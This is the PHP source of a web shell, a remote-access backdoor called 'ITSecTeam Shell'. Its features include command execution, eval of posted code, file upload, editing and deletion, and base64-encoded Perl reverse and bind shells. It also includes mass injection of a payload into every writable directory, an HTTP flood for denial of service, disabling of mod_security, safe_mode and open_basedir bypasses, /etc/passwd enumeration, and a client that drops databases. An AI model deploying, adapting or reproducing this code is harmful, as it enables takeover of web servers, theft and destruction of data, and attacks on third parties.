"; $formg="
"; $nowaddress=''; if (isset($_FILES["filee"]) and ! $_FILES["filee"]["error"]) { if(move_uploaded_file($_FILES["filee"]["tmp_name"], $_FILES["filee"]["name"])){ alert("File Upload Successful"); }else{ alert("Permission Denied !"); } } if(ini_get('disable_functions')){ $disablef=ini_get('disable_functions'); }else{ $disablef="All Functions Enable"; } if(ini_get('safe_mode')){ $safe_modes="On"; }else{ $safe_modes="Off"; } if ($_REQUEST['chmode'] && $_REQUEST['chmodenum']){ if (chmod($_POST['chmode'],"0".$_POST['chmodenum'])){alert("Chmod Ok!");}else{alert("Permission Denied !");} } $picdir='iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAAB30lEQVR42mNggAAuIBZCwjxAzMiAC4jIykrZOLplhcWlzAuLS50PwkFRiTPl1TQDBSQk7OFYRMSejY1NA6iFiUFEUinKwS/mcURW1f9wIA7NrPwflFr63zow7bOJd9IbQ8/EN7qucW+0XOLeyJv5XmETU9RjUDV03BlX2P43oaz/f2hO+3+v5Pr/DlEV/81Div/r+eT+V3PL+C/tlvefP6Lzv6BRyD82ce1IBl07/zNJFf3/Eyon/Q8v7vuf0LPqf3Dt7P9mYWX/1YMr/oslTfrPnzjpv4h92n8Bo7D/rJJ6eQyS5n63PLJa/wcU9f33K+z9H9O7+n/TiRf/7Xp3/Ods3v9fJGnif3H37P/Cjqn/+azj/7PIGrQxsBn7P+V2yfzP45bzn9c9979cZN3/1LUX/ktMvfiftfnQf8Gw+v8C3vn/+Txy/3O7Zv1nVjCZx8DqkPCWw7/0PwgLRtb/d+vf/F+3fPZ/jtDa/0y1O/4zVW76zx5c/R+mhlnFfBsDm3fOZ/bIhv+cMU3/pXIm/xdK7f4P4oMwW0zLf7bEnv/s0c1wMSY953MMQnG1P5UKJ/8nFgvaBz9jYPTJfM2c2PqfWMxoGfCFgUFGK4pBw3wh0VhCuRSUkligaY9YzAIA/X/3S1/5EEMAAAAASUVORK5CYII='; $picfile='iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAABaElEQVR42mMIXfWfef7JT7Yrz34o33ABhj9BaKDYrP3PE6IqpgkyoINNFz9Gnnzw/f/NFz8w8JYrX//P2H6zMrByijCKpl1XPkbee/Xt//fv3zHw/ltf/x+4/vnT7O036wOzkTSuP/cu8sazz/+/fPmCgS8++vx/25XP/xcceP4xr2dLPFA5M1jTytPvIq88/vj/40fc+Oz15//LOxZXAZVzgDUtO/E68tLDD/8/fMCB33/4f/rqs/8lLQur4ZoWH3sdeeH+h//v37/Hjt+9/3/yytP/RU1ImuYefh159u67/2/fvsWK37x58//4pSf/C9A1nb7z9v/r169x4mOXHv/PQ9a0AOi8M3cgJmLDIE0nLj9Bdd6CYy8iz94BKniNBb+B0CdBmpADonP9/cjlBx7/333q8f89p9HwGaA4kF665/7/lGqkIHfwKRax9Yh1t3IICLZ1CApBx1ZAbGIbECwlr28IVM4KAPZgwQxbJyVoAAAAAElFTkSuQmCC'; $head=' iTSecTeam
 

首页 -- 文件管理 -- 命令执行 -- 反弹shell -- BypasS 命令执行(SF-DF) -- Symlink -- 绕过限制读文件 -- PHP命令 -- 数据库操作 -- 加密转换 -- 邮件使者
服务器信息
-- 本机死机 -- 备份数据库 -- 批量挂马 -- 下载文件 -- DDoS -- 查可写目录 -- Server -- Remove Me -- About

Operation System : '.php_uname().' | Php Version : '.phpversion().' | Safe Mode : '.$safe_modes.'
'; $end='

'.base64_decode("Q29kZWQgYnkgQW1pbiBTaG9rb2hpIChQZWp2YWsp").'
'.base64_decode("aVRTZWNUZWFtLmNvbQ==").'

'; $deny=$head."

Oh My God!
Permission Denied".$end; function alert($text){ echo ""; } if ($_GET['do']=="edit" && $_GET['filename']!="dir"){ if(is_readable($_GET['address'].$_GET['filename'])){ $opedit=fopen($_GET['address'].$_GET['filename'],"r"); while(!feof($opedit)) $data.=fread($opedit,9999); fclose($opedit); echo $head.$formp.$nowaddress.'

File Name : '.$_GET['address'].$_GET['filename'].'


'.$end;exit; }else{alert("Permission Denied !");}} function sizee($size) { if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} return $size; } if($_REQUEST['do']=='about'){ echo $head."

ITSecTeam, IT Security Research & Penetration Testing Team
Version 2.1
Last Update : 2010/10/10
Coded By : Amin Shokohi(Pejvak)
Special Thanks(M3hr@n.S , Am!rkh@n , R3dm0ve , Provider , H4mid@Tm3l , ahmadbady , Doosib )
首页 Page : http://www.itsecteam.com
Update Notice: ITSecTeam Shell
Forum : http://www.forum.itsecteam.com


 ______  ______  ____                   ______                               
/\__  _\/\__  _\/\  _`\                /\__  _\                              
\/_/\ \/\/_/\ \/\ \,\L\_\     __    ___\/_/\ \/    __     __      ___ ___    
   \ \ \   \ \ \ \/_\__ \   /'__`\ /'___\ \ \ \  /'__`\ /'__`\  /' __` __`\  
    \_\ \__ \ \ \  /\ \L\ \/\  __//\ \__/  \ \ \/\  __//\ \L\.\_/\ \/\ \/\ \ 
    /\_____\ \ \_\ \ `\____\ \____\ \____\  \ \_\ \____\ \__/.\_\ \_\ \_\ \_\
    \/_____/  \/_/  \/_____/\/____/\/____/   \/_/\/____/\/__/\/_/\/_/\/_/\/_/
                                                                             
                                                                             

                                                                        


".$end;exit; } function deleteDirectory($dir) { if (!file_exists($dir)) return true; if (!is_dir($dir) || is_link($dir)) return unlink($dir); foreach (scandir($dir) as $item) { if ($item == '.' || $item == '..') continue; if (!deleteDirectory($dir . "/" . $item)) { chmod($dir . "/" . $item, 0777); if (!deleteDirectory($dir . "/" . $item)) return false; };}return rmdir($dir);} function download($fileadd,$finame){ $dlfilea=$fileadd.$finame; header("Content-Disposition: attachment; filename=" . $finame); header("Content-Type: application/download"); header("Content-Length: " . filesize($dlfilea)); flush(); $fp = fopen($$dlfilea, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); } fclose($fp); } if($_GET['do']=="rename"){ echo $head.$formp.$nowaddress.'

To

'.$end;exit; } if ($_GET['byapache']=='ofms'){ $fse=fopen(getcwd().$slash.".htaccess","w"); fwrite($fse,' Sec------Engine Off Sec------ScanPOST Off '); fclose($fse); }elseif ($_GET['byapache']=='bysap'){ $fse=fopen(getcwd().$slash.".htaccess","w"); fwrite($fse,'Options +FollowSymLinks DirectoryIndex Persian-Gulf-For-Ever.html'); fclose($fse); }elseif ($_GET['byapache']=='sfadf'){ $fse=fopen(getcwd().$slash."php.ini","w"); fwrite($fse,'safe_mode=OFF disable_functions=NONE'); fclose($fse); } if($_GET['do']=="apache"){ echo $head.$formg.$nowaddress.'


'.$end;exit; } if($_GET['do']=="dd0s"){ echo $head.$formg.$nowaddress.'

Address : Time :

'.$end;exit; } if($_GET['urldd0'] && $_GET['timedd0']){ for ($id=0;$$id<$_GET['timedd0'];$id++){ $fp=null; $contents=null; $fp=fopen($_GET['urldd0'],"rb"); while (!feof($fp)) { $contents .= fread($fp, 8192); } fclose($fp); }} if($_GET['do']=="dlfile"){ echo $head.$formp.$nowaddress.'

下载文件!
Address :
Save To :

'.$end;exit; } function dirpe($addres){ global $slash; $idd=0; if ($dirhen = @opendir($addres)) { while ($file = readdir($dirhen)) { $permdir=str_replace('//','/',$addres.$slash.$file); if($file!='.' && $file!='..' && is_dir($permdir)){ if (is_writable($permdir)) { $dirdata[$idd]['filename']=$permdir; $idd++; } dirpe($permdir); } } closedir($dirhen); } else { return ("notperm"); } if ($dirdata){ return $dirdata; }else{ return "notfound"; } } function dirpmass($addres,$massname,$masssource){ global $slash; $idd=0; if ($dirhen = @opendir($addres)) { while ($file = readdir($dirhen)) { $permdir=str_replace('//','/',$addres.$slash.$file); if($file!='.' && $file!='..' && is_dir($permdir)){ if (is_writable($permdir)) { if ($fm=fopen($permdir.$slash.$massname,"w")){ fwrite($fm,$masssource); fclose($fm); $dirdata[$idd]['filename']=$permdir; } $idd++; } dirpmass($permdir); } } closedir($dirhen); } else { return ("notperm"); } if ($dirdata){ return $dirdata; }else{ return "notfound"; } } if($_GET['do']=="perm"){ echo $head.$formp.'

Find All Folder Writeable

'.$end;exit; } if ($_POST['affw']){ $arrfilelist=dirpe($_POST['affw']); if ($arrfilelist=='notfound'){ alert("Not Found !"); }elseif($arrfilelist=='notperm'){ alert("Permission Denied !"); }else{ foreach ($arrfilelist as $tmpdir){ if ($coi %2){ $colort='"#e7e3de"'; }else{ $colort='"#e4e1de"';} $coi++; $permdir=$permdir.'

'.$tmpdir['filename'].'

'; } echo $head.'

Now Directory : '.getcwd()."
".printdrive().'
Back

'.$permdir.' '.$end;exit; }} if($_GET['do']=="mass"){ echo $head.$formp.'

[批量挂马]


'.$end;exit; } if ($_POST['mffw']){ $arrfilelist=dirpmass($_POST['mffw'],$_POST['massname'],$_POST['masssource']); if ($arrfilelist=='notfound'){ alert("Not Found !"); }elseif($arrfilelist=='notperm'){ alert("Permission Denied !"); }else{ foreach ($arrfilelist as $tmpdir){ if ($coi %2){ $colort='"#e7e3de"'; }else{ $colort='"#e4e1de"';} $coi++; $permdir=$permdir.'

'.$formg.'Change Directory
Upload --->  
'.$nowaddress.'
'.$ifupload.'
'.$formp.'Chmod ---->  File :
  Permission :
'.$formp.'Create Dir ----> Dirctory Name '.$nowaddress.'
'.$formp.'Create File ----> Name File '.$nowaddress.'
'.$formp.'Copy ---->  File : To Directory

'.$tmpdir['filename'].'

'; } echo $head.'

Now Directory : '.getcwd()."
".printdrive().'
Back

'.$permdir.' '.$end;exit; }} if($_POST['adlr'] && $_POST['adsr']){ $url = $_POST['adlr']; $newfname = $_POST['adsr'] . basename($url); $file = fopen ($url, "rb"); if ($file) { $newf = fopen ($newfname, "wb"); if ($newf) while(!feof($file)) { fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 ); } alert("File Downloaded Success"); }else{alert("Can Not Open File");} if ($file) { fclose($file); } if ($newf) { fclose($newf); } } if($_GET['do']=="down" and $_GET['type']=='file'){ download($_GET['address'],$_GET['filename']);} if($_GET['do']=="down" and $_GET['type']=='dir'){ class zipfile { var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0; function add_dir($name) { $name = str_replace("\\", "/", $name); $fr = "\x50\x4b\x03\x04"; $fr .= "\x0a\x00"; $fr .= "\x00\x00"; $fr .= "\x00\x00"; $fr .= "\x00\x00\x00\x00"; $fr .= pack("V",0); $fr .= pack("V",0); $fr .= pack("V",0); $fr .= pack("v", strlen($name) ); $fr .= pack("v", 0 ); $fr .= $name; $fr .= pack("V",$crc); $fr .= pack("V",$c_len); $fr .= pack("V",$unc_len); $this -> datasec[] = $fr; $new_offset = strlen(implode("", $this->datasec)); $cdrec = "\x50\x4b\x01\x02"; $cdrec .="\x00\x00"; $cdrec .="\x0a\x00"; $cdrec .="\x00\x00"; $cdrec .="\x00\x00"; $cdrec .="\x00\x00\x00\x00"; $cdrec .= pack("V",0); $cdrec .= pack("V",0); $cdrec .= pack("V",0); $cdrec .= pack("v", strlen($name) ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $ext = "\x00\x00\x10\x00"; $ext = "\xff\xff\xff\xff"; $cdrec .= pack("V", 16 ); $cdrec .= pack("V", $this -> old_offset ); $this -> old_offset = $new_offset; $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function add_file($data, $name) { $name = str_replace("\\", "/", $name); $fr = "\x50\x4b\x03\x04"; $fr .= "\x14\x00"; $fr .= "\x00\x00"; $fr .= "\x08\x00"; $fr .= "\x00\x00\x00\x00"; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $zdata = substr( substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr .= pack("V",$crc); $fr .= pack("V",$c_len); $fr .= pack("V",$unc_len); $fr .= pack("v", strlen($name) ); $fr .= pack("v", 0 ); $fr .= $name; $fr .= $zdata; $fr .= pack("V",$crc); $fr .= pack("V",$c_len); $fr .= pack("V",$unc_len); $this -> datasec[] = $fr; $new_offset = strlen(implode("", $this->datasec)); $cdrec = "\x50\x4b\x01\x02"; $cdrec .="\x00\x00"; $cdrec .="\x14\x00"; $cdrec .="\x00\x00"; $cdrec .="\x08\x00"; $cdrec .="\x00\x00\x00\x00"; $cdrec .= pack("V",$crc); $cdrec .= pack("V",$c_len); $cdrec .= pack("V",$unc_len); $cdrec .= pack("v", strlen($name) ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("V", 32 ); $cdrec .= pack("V", $this -> old_offset ); $this -> old_offset = $new_offset; $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode("", $this -> datasec); $ctrldir = implode("", $this -> ctrl_dir); return $data. $ctrldir. $this -> eof_ctrl_dir. pack("v", sizeof($this -> ctrl_dir)). pack("v", sizeof($this -> ctrl_dir)). pack("V", strlen($ctrldir)). pack("V", strlen($data)). "\x00\x00"; } } $dlfolder=$_GET['address'].$slash.$_GET['dirname'].$slash; $zipfile = new zipfile(); function get_files_from_folder($directory, $put_into) { global $zipfile; if ($handle = opendir($directory)) { while (false !== ($file = readdir($handle))) { if (is_file($directory.$file)) { $fileContents = file_get_contents($directory.$file); $zipfile->add_file($fileContents, $put_into.$file); } elseif ($file != '.' and $file != '..' and is_dir($directory.$file)) { $zipfile->add_dir($put_into.$file.'/'); get_files_from_folder($directory.$file.'/', $put_into.$file.'/'); } } } closedir($handle); } $datedl=date("y-m-d"); get_files_from_folder($dlfolder,''); header("Content-Disposition: attachment; filename=" . $_GET['dirname']."-".$datedl.".zip"); header("Content-Type: application/download"); header("Content-Length: " . strlen($zipfile -> file())); flush(); echo $zipfile -> file(); $filename = $_GET['dirname']."-".$datedl.".zip"; $fd = fopen ($filename, "wb"); $out = fwrite ($fd, $zipfile -> file()); fclose ($fd); } if ($_REQUEST['cdirname']){ if(mkdir($_REQUEST['cdirname'],"0777")){alert("Directory Created !");}else{alert("Permission Denied !");}} function bcn($ipbc,$pbc){ $bcperl="IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZXJsLiBTaGFkb3cxMjAgLSB3 NGNrMW5nLmNvbQoKdXNlIFNvY2tldDsKCiRob3N0ID0gJEFSR1ZbMF07CiRwb3J0ID0gJEFSR1Zb MV07CgogICAgaWYgKCEkQVJHVlswXSkgewogIHByaW50ZiAiWyFdIFVzYWdlOiBwZXJsIHNjcmlw dC5wbCA8SG9zdD4gPFBvcnQ+XG4iOwogIGV4aXQoMSk7Cn0KcHJpbnQgIlsrXSBDb25uZWN0aW5n IHRvICRob3N0XG4iOwokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyBZb3UgY2FuIGNo YW5nZSB0aGlzIGlmIG5lZWRzIGJlCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFN LCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsKaWYgKCFjb25uZWN0 KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGll KCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOwog IG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOwogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOwogIGV4 ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow=="; $opbc=fopen("bcc.pl","w"); fwrite($opbc,base64_decode($bcperl)); fclose($opbc); system("perl bcc.pl $ipbc $pbc") or die("I Can Not Execute Command For 反弹shell Disable_functions Or Safe Mode"); } function wbp($wb){ $wbp="dXNlIFNvY2tldDsKJHBvcnQJPSAkQVJHVlswXTsKJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3Rj cCcpOwpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsKc2V0c29j a29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygibCIsIDEpKTsKYmlu ZChTRVJWRVIsIHNvY2thZGRyX2luKCRwb3J0LCBJTkFERFJfQU5ZKSk7Cmxpc3RlbihTRVJWRVIs IFNPTUFYQ09OTik7CmZvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNFUlZFUik7IGNsb3Nl IENMSUVOVCkKewpvcGVuKFNURElOLCAiPiZDTElFTlQiKTsKb3BlbihTVERPVVQsICI+JkNMSUVO VCIpOwpvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7CnN5c3RlbSgnY21kLmV4ZScpOwpjbG9zZShT VERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7Cn0g"; $opwb=fopen("wbp.pl","w"); fwrite($opwb,base64_decode($wbp)); fclose($opwb); echo getcwd(); system("perl wbp.pl $wb") or die("I Can Not Execute Command For 反弹shell Disable_functions Or Safe Mode"); } function lbp($wb){ $lbp="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7JHBvcnQ9JEFSR1ZbMF07JHByb3RvPWdldHByb3Rv YnluYW1lKCd0Y3AnKTskY21kPSJscGQiOyQwPSRjbWQ7c29ja2V0KFNFUlZFUiwgUEZfSU5FVCwg U09DS19TVFJFQU0sICRwcm90byk7c2V0c29ja29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JF VVNFQUREUiwgcGFjaygibCIsIDEpKTtiaW5kKFNFUlZFUiwgc29ja2FkZHJfaW4oJHBvcnQsIElO QUREUl9BTlkpKTtsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pO2Zvcig7ICRwYWRkciA9IGFjY2Vw dChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCl7b3BlbihTVERJTiwgIj4mQ0xJRU5UIik7 b3BlbihTVERPVVQsICI+JkNMSUVOVCIpO29wZW4oU1RERVJSLCAiPiZDTElFTlQiKTtzeXN0ZW0o Jy9iaW4vc2gnKTtjbG9zZShTVERJTik7Y2xvc2UoU1RET1VUKTtjbG9zZShTVERFUlIpO30g"; $oplb=fopen("lbp.pl","w"); fwrite($oplb,base64_decode($lbp)); fclose($oplb); system("perl lbp.pl $wb") or die("I Can Not Execute Command For 反弹shell Disable_functions Or Safe Mode"); } if($_REQUEST['portbw']){ wbp($_REQUEST['portbw']); }if($_REQUEST['portbl']){ lbp($_REQUEST['portbl']); } if($_REQUEST['ipcb'] && $_REQUEST['portbc']){ bcn($_REQUEST['ipcb'],$_REQUEST['portbc']); } if($_REQUEST['do']=="bc"){ echo $head.$formp."

Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )


<<<<<< 反弹shell >>>>>>
Ip Address : Port :
".$formp."

Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )


<<<<<< Windows Bind Port >>>>>>
Port :
".$formp."

Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )


<<<<<< Linux Bind Port >>>>>>
Port :
".$end;exit; } function copyf($file1,$file2,$filename){ global $slash; $fpc = fopen($file1, "rb"); $source = ''; while (!feof($fpc)) { $source .= fread($fpc, 8192); } fclose($fpc); $opt = fopen($file2.$slash.$filename, "w"); fwrite($opt, $source); fclose($opt); } if ($_REQUEST['copyname'] && $_REQUEST['cpyto']){ if(is_writable($_REQUEST['cpyto'])){ echo $_REQUEST['address']; copyf($_REQUEST['address'].$slash.$_REQUEST['copyname'],$_REQUEST['cpyto'],$_REQUEST['copyname']); }else{alert("Permission Denied !");}} if($_REQUEST['cfilename']){ echo $head.$formp.$nowaddress.'

Create File


'.$end;exit; } if($_REQUEST['nf4c'] && $_REQUEST['nf4cs']){ if($ofile4c=fopen($_REQUEST['nf4c'],"w")){ fwrite($ofile4c,$_REQUEST['nf4cs']); fclose($ofile4c); alert("File Saved !");}else{alert("Permission Denied !");}} function sqlclienT(){ global $t,$errorbox,$et,$hcwd; if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){ $server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY']; $db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB']; $_SESSION[server]=$_REQUEST['serveR'];$_SESSION[type]=$_REQUEST['typE'];$_SESSION[pass]=$_REQUEST['pasS'];$_SESSION[user]=$_REQUEST['useR']; } if (isset ($_GET[select_db])){ $getdb=$_GET[select_db]; $_SESSION[db]=$getdb; $query="SHOW TABLES"; $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query); } elseif (isset ($_GET[select_tbl])){ $tbl=$_GET[select_tbl]; $_SESSION[tbl]=$tbl; $query="SELECT * FROM `$tbl`"; $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query); } elseif (isset ($_GET[drop_db])){ $getdb=$_GET[drop_db]; $_SESSION[db]=$getdb; $query="DROP DATABASE `$getdb`"; querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'',$query); $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'','SHOW DATABASES'); } elseif (isset ($_GET[drop_tbl])){ $getbl=$_GET[drop_tbl]; $query="DROP TABLE `$getbl`"; querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query); $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],'SHOW TABLES'); } elseif (isset ($_GET[drop_row])){ $getrow=$_GET[drop_row]; $getclm=$_GET[clm]; $query="DELETE FROM `$_SESSION[tbl]` WHERE $getclm='$getrow'"; $tbl=$_SESSION[tbl]; querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query); $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],"SELECT * FROM `$tbl`"); } else $res=querY($type,$server,$user,$pass,$db,$query); if($res){ $res=htmlspecialchars($res); $row=array (); $title=explode('[+][+][+]',$res); $trow=explode('[-][-][-]',$title[1]); $row=explode('|+|+|+|+|+|',$title[0]); $data=array(); $field=$trow[count($trow)-2]; if (strstr($trow[0],'Database')!='') $obj='db'; elseif (substr($trow[0],0,6)=='Tables') $obj='tbl'; else $obj='row'; $i=0; foreach ($row as $a){ if($a!='') $data[$i++]=explode('|-|-|-|-|-|',$a); } echo "


'.$formg.'Change Directory
Upload --->  
'.$nowaddress.'
'.$ifupload.'
'.$formp.'Chmod ---->  File :
  Permission :
'.$formp.'Create Dir ----> Dirctory Name '.$nowaddress.'
'.$formp.'Create File ----> Name File '.$nowaddress.'
'.$formp.'Copy ---->  File : To Directory
"; foreach ($trow as $ti) echo ""; echo ""; $j=0; while ($data[$j]){ echo ""; foreach ($data[$j++] as $dr){ echo ""; } echo ""; } echo "
$ti
"; if($obj!='row') echo ""; echo $dr; if($obj!='row') echo ""; echo "Drop

"; } if(empty($_REQUEST['typE']))$_REQUEST['typE']=''; echo "

Connect to Database

DB Type:
Server Address:
Username:
Password:

Submit a Query

DB Name:
Query:
$hcwd
$et
"; } function querY($type,$host,$user,$pass,$db='',$query){ $res=''; switch($type){ case 'MySQL': if(!function_exists('mysql_connect'))return 0; $link=mysql_connect($host,$user,$pass); if($link){ if(!empty($db))mysql_select_db($db,$link); $result=mysql_query($query,$link); if ($result!=1){ while($data=mysql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|'; $res.='[+][+][+]'; for($i=0;$i
'; curl_close($ch); } if ($_REQUEST['bypcu']){ bypcu($_REQUEST['bypcu']); } if($_REQUEST['do']=="bypasscmd"){ if($_POST['bycw']){ echo $_POST['bycw']; $wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll'); $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['bycw'].""); $stdout = $exec->StdOut(); $stcom = $stdout->ReadAll();} echo $head.'


Bypass Safe_Mode And Disable_Functions In Windows Server
'.$formp.'Command
Bypass Safe_Mode Windows Server
'.$formp.'Command
'.$end;exit;; } if($_REQUEST['do']=="bypassdir"){ if($_POST['byoc']){ if(copy("compress.zlib://".$_POST['byoc'], getcwd()."/"."peji.txt")){ $bopens="Bypass Succesfull Plz Read File Peji.txt In This Folder"; }else{$bopens="Can Not Bypass This";} } if($_POST['byfc']){ curl_init("file:///".$_POST['byfc']."\x00/../../../../../../../../../../../../".__FILE__); $debfc=curl_exec($ch); } if($_POST['byetc']){ for($bye=0;$bye<40000;$bye++){ $sbep =$sbep. posix_getpwuid($bye); }} if($_POST['byfc9']){ echo "not sucsfull"; } if($_REQUEST['bysyml']){ $file=$_REQUEST['bysyml']; bywsym($file); } echo $head.'


Bypass Safe_Mode And Open_basedir With Bug Copy(Zlib) Worked In 4.4.2 .. 5.1.2
'.$formp.'Address File

Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.4.2 and 5.1.4
'.$formp.'Address File

Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.X ... 5.2.9
'.$formp.'Address File

Bypass /Etc/Passwd
'.$formp.'
Bypass With ini_restore'.$formp.'
Bypass With Symlink Worked In 5.x.x 5.2.11 With Bug Symlink
'.$formp.'

'.$formp.'Bypass Safe And Open_basedir With Bug Curl Worked In 4.x.x ... 5.2.9
'.$formp.'
'.$end;exit;; } function printdrive(){ global $slash; foreach (range("A","Z") as $tempdrive) { if (is_dir($tempdrive.":".$slash)){ $adri=$tempdrive.":".$slash; $drivea=$drivea.''.$tempdrive.':'.$slash.' '; } } return $drivea; } if($_POST['nameren'] && $_POST['addressren']){ if(is_writable($_REQUEST['addressren'])){ rename($_POST['addressren'],$_POST['nameren']);alert("Rename Successful !"); }else{alert("Permission Denied !");} } if($_GET['do']=="delete"){ if ($_GET['type']=="dir"){ if(is_writable($_REQUEST['address'])){ $dir=$_GET['address'].$_GET['filename']; deleteDirectory($dir); alert("Deleted Successful !"); }else{alert("Permission Denied !");} }elseif($_GET['type']=="file"){ if(is_writable($_GET['address'].$_GET['filename'])){ unlink($_GET['address'].$_GET['filename']);alert("Deleted Successful !"); }else{alert("Permission Denied !");} } } if($_POST['fedit'] && $_POST['namefe']){ if(is_writable($_REQUEST['address'])){ $opensave=fopen($_POST['address'].$slash.$_POST['namefe'],"w"); fwrite($opensave,html_entity_decode($_POST['fedit'])); fclose($opensave);alert("File Saved Successful !"); }else{alert("Permission Denied !");} } if ($_POST['evalsource']){ eval($_POST['evalsource']); } if($_GET['do']=="eval"){ echo $head.$formp.$nowaddress.'


'.$end;exit; } if($_GET['do']=="info"){ if(ini_get('register_globals')){ $registerg="Enable"; }else{ $registerg="disable"; } if(extension_loaded('curl')){ $curls="Enable"; }else{ $curls="disable"; } if(@function_exists('mysql_connect')){ $db_on = "Mysql : On"; }; if(@function_exists('mssql_connect')){ $db_on = "Mssql : On"; }; if(@function_exists('pg_connect')){ $db_on = "PostgreSQL : On"; };if(@function_exists('ocilogon')){ $db_on = "Oracle : On"; }; echo $head."Operating System : ".php_uname()."
Server Name : ".$_SERVER['HTTP_HOST']."
Disable_Functions : ".$disablef."
Safe_Mode : ".$safe_modes."
Openbase_dir : ".ini_get('openbase_dir')."
Php Version : ".phpversion()."
Free Space : ".sizee(disk_free_space("/"))."
Total Space : ".sizee(disk_total_space("/"))."
Register_Globals : ".$registerg."
Curl : ".$curls."
Database ".$db_on."
Server Name : ".$_SERVER['HTTP_HOST']."
Admin Server : ".$_SERVER['SERVER_ADMIN'].$end; exit; } if ($_GET['do']=="cmd"){ echo $head.'

'.$end;exit;} if ($_GET['do']=="symlink"){ echo $head.'

SymLink With PHP
TO


SymLink With OS :
TO

'.$end;exit;} if ($_POST['ad1syp'] && $_POST['ad2syp']){ if (symlink($_POST['ad1syp'],$_POST['ad2syp'])){ alert("Symlink Worked !"); }else{ alert("Symlink Not Worked !"); }} if ($_POST['ad1syc'] && $_POST['ad2syc']){ if (system('ls -s '.$_POST['ad1syc']." ".$_POST['ad2syc'])){ alert("Symlink Worked !"); }else{alert("Symlink Not Worked !");} } if ($_GET['do']=="d0slocal"){ echo $head.'

If You Click This Link This Server Crashed.
This Worked In Php 5.3.x : Dos This Server I Am Sure
